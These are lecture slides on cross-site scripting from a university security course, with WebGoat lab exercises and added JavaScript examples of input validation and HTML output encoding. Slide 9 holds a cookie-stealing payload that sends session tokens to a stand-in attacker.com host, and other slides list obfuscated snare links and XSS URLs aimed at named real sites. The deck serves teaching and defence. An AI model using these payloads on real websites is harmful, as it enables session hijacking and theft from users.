Cross Site Scripting XSS - PowerPoint PPT Presentation

Provided by: NKU
Slides: 40

1
Cross Site Scripting (XSS)
  • Charles Frank
  • Northern Kentucky University

2
Cross-Site Scripting (XSS)
  • Attacker causes a legitimate web server to send
    user executable content (JavaScript, Flash
    ActiveScript) of the attacker's choosing.
  • XSS used to obtain session ID for
    • Bank site (transfer money to attacker)
    • Shopping site (buy goods for attacker)
    • E-mail
  • Key ideas
    • Attacker sends malicious code to server.
    • Victim's browser loads code from server and runs
      it.

3
Vulnerability Trends for 2006
4
Anatomy of an XSS Attack
  • User logs into legitimate site.
  • Site sends user authentication cookie.
  • Attacker sends user XSS attack containing
    injected code.
  • User clicks on XSS link in email, web, IM.
  • Browser contacts vulnerable URL at legitimate
    site with cookie in URL.
  • Legitimate site returns injected code in web
    page.
  • Browser runs injected code, which accesses evil
    site with cookie in URL.
  • Evil site records user cookie.
  • Attacker uses cookie to authenticate to
    legitimate site as user.

5
XSS Example
  • Client browser sends an error message to the web
    server.
  • https://example.com/error.php?message=Sorry%2C+an+error+occurred

6
XSS Example
  • The error message is Reflected back from the
    Web server to the client in a web page.
  • <p>Sorry, an error occurred.</p>

7
XSS Example
  • We can replace the error message with JavaScript:
  • https://example.com/error.php?message=<script>alert(xss)</script>

8
Proof of Concept
9
Exploiting the Vulnerability
  • User logs in and is issued a cookie.
  • Attacker feeds the URL to the user:
  • https://example.com/error.php?message=<script>var+i=new+Image;i.src="http://attacker.com/"%2bdocument.cookie</script>

10
Exploiting the Vulnerability
  • The server responds by sending the user a web
    page that runs the JavaScript.
  • The code makes a request to attacker.com
    containing the session token.

11
Exploiting the Vulnerability
  • The attacker monitors requests to attacker.com.
  • He uses the captured session token to gain access
    to the user's personal information and perform
    actions as the user.

12
Email Snare
  • From: Example Customer Services
  • To: J Q Customer
  • Dear Valued Customer,
  • You have been selected to participate in our
    customer survey. Please complete our easy 5
    question survey, and in return we will credit 5 to
    your account.

13
Email Snare
  • To access the survey, please log in to your
    account using your usual bookmark, and then click
    on the following link:
  • https://example.com/%65%72%72...?message%3d...att%61%63%6b.com...docum%65..%63ookie...

14
Reassuring Email
  • The link contains the correct domain name (unlike
    phishing).
  • The URL has been obfuscated
  • It uses https

15
Reflected XSS
  • Reflected XSS
  • Injected script returned by one-time message.
  • Requires tricking user to click on link.
  • Non-persistent. Only works when user clicks.

16
Anatomy of an XSS Attack
Diagram (slide 16): parties are User, Web Server, and Attacker. Steps:
  1. Login
  2. Cookie
  3. XSS Attack
  4. User clicks on XSS link.
  5. XSS URL
  6. Page with injected code.
  7. Browser runs injected code. Evil site saves ID.
  8. Attacker hijacks user session.
17
XSS URL Examples
  • http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target="><script>alert(document.cookie)</script>
  • http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>alert(Test)</script>
  • http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1
  • http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=_%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

18
Stored XSS
  • Stored XSS
  • Injected script stored in comment, message, etc.
  • Requires ability to insert malicious code into
    web documents (comments, reviews, etc.)
  • Persistent until message deleted.

19
Stored XSS
  • Auction site that allows buyers to post questions
    and sellers to post responses.
  • If an attacker can post a question containing a
    script, the attacker could get a user to bid
    without intending to, or get the seller to close
    the auction and accept the attacker's low bid.

20
Why does XSS Work?
  • Same-Origin Policy
  • Browser only allows Javascript from site X to
    access cookies and other data from site X.
  • Attacker needs to make attack come from site X.
  • Vulnerable Server Program
  • Any program that returns user input without
    filtering out dangerous code.

21
XSS Attacks
  • MySpace worm (October 2005)
    • When someone viewed Samy's profile:
    • Set him as friend of viewer.
    • Incorporated code in viewer's profile.
  • Paypal (2006)
    • XSS redirect used to steal money from Paypal
      users in a phishing scam.
  • BBC, CBS (2006)
    • By following XSS link from securitylab.ru, you
      could read an apparently valid story on the BBC
      or CBS site claiming that Bush appointed a 9-year
      old as head of the Information Security
      department.

22
Impact of XSS
  • Attackers can hijack user accounts.
  • Attackers can hijack admin accounts too.
  • Attacker can do anything a user can do.
  • Difficult to track down source of attack.

23
Mitigating XSS
  • Disallow HTML input
  • Allow only safe HTML tags
  • Filter output
    • Replace HTML special characters in output
    • ex: replace < with &lt; and > with &gt;
    • also replace (, ), and other special characters
  • Tagged cookies
    • Include IP address in cookie and only allow
      access to original IP address that cookie was
      created for.

24
XSS Problem
  • XSS is a complex problem that is not going away
    anytime soon.
  • The browser is insecure by design.
  • It understands JavaScript.
  • It isn't the browser's job to determine what code
    is good or bad.
  • Disabling scripting seriously dampens the user's
    browsing experience.

25
Cross-Site Scripting Demo
26
OWASP WebGoat
  • http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
  • WebGoat 5.2 Standard
  • WebGoat 5.2 Developer
  • Run webgoat.bat to start Tomcat
  • Enter http://localhost/WebGoat/attack in your
    browser

27
OWASP WebGoat
  • Username: guest
  • Password: guest
  • Start WebGoat

28
Reflected XSS Attacks
  • Solution
  • Enter <script>alert('Bang!')</script> for the PIN
    value
  • View Page Source
  • Edit > Find "Bang"

29
Stage 6 Blocked Reflected XSS
  • You have to edit
    org.owasp.webgoat.lessons.CrossSiteScripting.FindProfile.java.
    Alter the method getRequestParameter. The body of
    the method should look something like this:

30
Stage 6 Blocked Reflected XSS
      // allow-list: whitespace, word characters, '-' and ',' only
      String regex = "[\\s\\w-,]*";
      String parameter = s.getParser().getRawParameter(name);
      Pattern pattern = Pattern.compile(regex);
      // throws a ValidationException if the parameter does not match
      validate(parameter, pattern);
      return parameter;

31
Stage 1 Stored XSS
  • First log in as Tom with tom as password.
  • Select Tom from the list and click on the View
    Profile button. Tom's profile should now appear.

32
Stage 1 Stored XSS
  • Click on the 'Edit Profile' button and try an XSS
    attack on the street field. For example:
    <script>alert("Got Ya")</script>
  • Click on the UpdateProfile button and log out.

33
Stage 1 Stored XSS
  • Now log in as Jerry with jerry as password.
    Select Tom's profile from the list and
    hit the ViewProfile button.

34
Stage 2 Blocked Stored XSS using Input Validation
  • Solution: You have to alter the method
    parseEmployeeProfile in the class
    UpdateProfile.java, which is placed in the package
    org.owasp.webgoat.lessons.CrossSiteScripting. The
    place to code is marked!

35
Stage 2 Blocked Stored XSS using Input Validation
      // same allow-list as Stage 6: whitespace, word characters, '-' and ','
      String regex = "[\\s\\w-,]*";
      // all profile fields are joined and checked as one string
      String stringToValidate = firstName + lastName + ssn + title + phone
          + address1 + address2 + startDate + ccn + disciplinaryActionDate
          + disciplinaryActionNotes + personalDescription;
      Pattern pattern = Pattern.compile(regex);
      validate(stringToValidate, pattern);

36
Stage 2 Blocked Stored XSS using Input Validation
  • This validation allows the following: \s
    (whitespace: [ \t\n\x0B\f\r]), \w (word
    characters: [a-zA-Z_0-9]), and the characters - and ,
  • Use of any other character will throw a
    ValidationException.
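
To see concretely what the Stage 2 / Stage 6 allow-list accepts and refuses, here is the same character class reproduced in JavaScript for Node.js. This is an added example, not WebGoat's code (WebGoat's own validate method is Java and throws a ValidationException instead of returning false); the profile values and the helper names isAllowed, rejectedChars and validateProfile are constructed for the demonstration.

```javascript
// Added example (not WebGoat's code): the Stage 2 / Stage 6 allow-list
// regex "[\\s\\w-,]*" reproduced in JavaScript. The hyphen is escaped
// (\-) so the class reads the same in JavaScript's unicode mode.
const PROFILE_FIELD_PATTERN = /^[\s\w\-,]*$/;

// True when every character is whitespace, a word character (a-z, A-Z,
// 0-9, _), a hyphen or a comma. Note the '*': an empty string is allowed.
function isAllowed(value) {
  return PROFILE_FIELD_PATTERN.test(value);
}

// Which characters of the input the allow-list refuses (deduplicated, in
// order of first appearance). Handy for explaining a rejection to a user.
function rejectedChars(value) {
  return [...new Set([...value].filter((ch) => !isAllowed(ch)))];
}

// Stage 2 joins all profile fields into one string and validates that.
// Because the allowed set is the same at every position, checking the
// joined string is equivalent to checking each field on its own.
function validateProfile(fields) {
  const joined = Object.values(fields).join('');
  const bad = rejectedChars(joined);
  if (bad.length > 0) {
    throw new Error(`ValidationException: disallowed characters ${JSON.stringify(bad)}`);
  }
  return true;
}

// Constructed sample profiles (not WebGoat's data).
const LEGIT_PROFILE = { firstName: 'Tom', lastName: 'Cat', street: '123 Main St, Apt 4' };
const XSS_PROFILE = { firstName: 'Tom', lastName: 'Cat', street: '<script>alert("Got Ya")</script>' };
// Values a real user might legitimately enter that this allow-list also refuses.
const COLLATERAL = ["O'Brien", 'john@example.com', 'St. Louis'];

function demo() {
  for (const profile of [LEGIT_PROFILE, XSS_PROFILE]) {
    try {
      validateProfile(profile);
      console.log('accepted:', profile.street);
    } catch (e) {
      console.log('rejected:', profile.street, '->', e.message);
    }
  }
  for (const v of COLLATERAL) {
    console.log('legitimate but refused:', v, rejectedChars(v));
  }
}
demo();
```

Run it with node and the rejected set for the Stage 1 payload comes out as <, >, (, ", ) and /, which is exactly why the script tag can no longer be stored. The COLLATERAL list shows the cost of input allow-listing: apostrophes, dots and @ in ordinary names and addresses are refused too, which is one reason Stage 4 switches to encoding at output instead.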

37
Stage 3 Stored XSS Revisited
  • Log in as David with david as password. Choose
    Bruce from the List and click on the
    'ViewProfile' Button.

38
Stage 4 Blocked XSS using Output Encoding
  • You have to use a static method called
    encode(String s) which is part of the class
    org.owasp.webgoat.util.HtmlEncoder.
  • This method changes all special characters in the
    string.
  • Now you have to use this method in the
    getEmployeeProfile method in the
    org.owasp.webgoat.lessons.CrossSiteScripting
    class. Replace all
    answer_results.getString(someString) with
    HtmlEncoder.encode(answer_results.getString(someString))
    and you are done.
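
The reflected error page from slides 5 to 7 and the output-encoding fix from slide 23 and Stage 4, written out in JavaScript for Node.js as an added example (not code from the slides or from WebGoat). escapeHtml is our own stand-in for WebGoat's HtmlEncoder.encode, assumed to do the same entity replacement; messageFromUrl uses the built-in URL class to decode the query string the way error.php would receive it. The two request URLs are the deck's example.com ones, percent-encoded as a browser would send them.

```javascript
// Added example (not from the slides or WebGoat): reflected XSS in an
// error page and the output-encoding fix. Runs under Node.js 14+.

// Decode the "message" query parameter the way a server-side framework
// hands it to error.php: %xx escapes decoded, '+' turned into a space.
function messageFromUrl(requestUrl) {
  return new URL(requestUrl).searchParams.get('message') ?? '';
}

// Vulnerable rendering (slide 6): the parameter is pasted into the HTML
// untouched, so <script>...</script> in the message becomes live script.
function renderErrorPageUnsafe(message) {
  return `<p>${message}</p>`;
}

// Output encoding (slide 23 / Stage 4): replace every HTML metacharacter
// with its entity so the browser displays the text instead of parsing it.
// Our own stand-in for WebGoat's HtmlEncoder.encode (assumed equivalent).
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')   // first, so the entities added below are not re-encoded
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened rendering: same template, encoded data.
function renderErrorPageSafe(message) {
  return `<p>${escapeHtml(message)}</p>`;
}

// Review helper for rendered output: did a script tag that is not part of
// the template end up in the page?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed demo URLs: the benign message from slide 5 and the payload
// from slide 7, percent-encoded as a browser would send them.
const BENIGN_URL = 'https://example.com/error.php?message=Sorry%2C+an+error+occurred';
const XSS_URL = 'https://example.com/error.php?message=%3Cscript%3Ealert(xss)%3C%2Fscript%3E';

function demo() {
  for (const url of [BENIGN_URL, XSS_URL]) {
    const msg = messageFromUrl(url);
    const unsafe = renderErrorPageUnsafe(msg);
    console.log('request :', url);
    console.log('unsafe  :', unsafe, containsScriptTag(unsafe) ? '<- script reflected' : '');
    console.log('encoded :', renderErrorPageSafe(msg));
  }
}
demo();
```

The encoding happens where the value is written into HTML, not where it is stored, so the profile data entered in Stage 1 and Stage 3 can stay exactly as the user typed it and still render as harmless text. Encoding & before the other characters matters: doing it afterwards would turn the freshly added &lt; into &amp;lt;.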

39
XSS References